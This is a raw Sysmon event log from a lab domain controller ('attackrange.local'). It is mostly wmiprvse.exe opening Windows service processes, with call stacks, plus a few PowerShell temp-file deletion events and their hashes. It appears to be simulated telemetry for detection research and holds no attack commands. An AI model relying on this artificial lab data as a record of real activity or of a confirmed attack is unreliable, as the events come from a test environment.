16:54:43.701{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3200-00000000AD01}3220C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243350Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.701{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3000-00000000AD01}3052C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243349Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.701{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2F00-00000000AD01}2724C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002243348Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.701{05ADC7E1-6DD3-603E-E0AA-00000000AD01}11056ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_fskkbay5.wh2.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002243347Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.701{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243346Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.701{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002243345Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.701{05ADC7E1-6DD3-603E-E0AA-00000000AD01}11056ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_u1dvc3km.2mg.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002243344Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.701{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2C00-00000000AD01}2516C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243343Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.701{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2A00-00000000AD01}2644C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243342Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.701{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2900-00000000AD01}2700C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243341Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.686{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243340Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.686{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243339Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.686{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2600-00000000AD01}2596C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243338Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.686{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6DD3-603E-E3AA-00000000AD01}3580C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243337Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.686{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6DD3-603E-E3AA-00000000AD01}3580C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243336Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.686{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2500-00000000AD01}2284C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243335Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.686{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A9-6039-2300-00000000AD01}2940C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002243334Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.686{05ADC7E1-6DD3-603E-DCAA-00000000AD01}11576ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002243333Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.686{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A0-6039-2100-00000000AD01}2392C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243332Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.686{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1700-00000000AD01}1640C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243331Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.686{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243330Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.686{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1500-00000000AD01}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243329Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.686{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1400-00000000AD01}1316C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243328Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 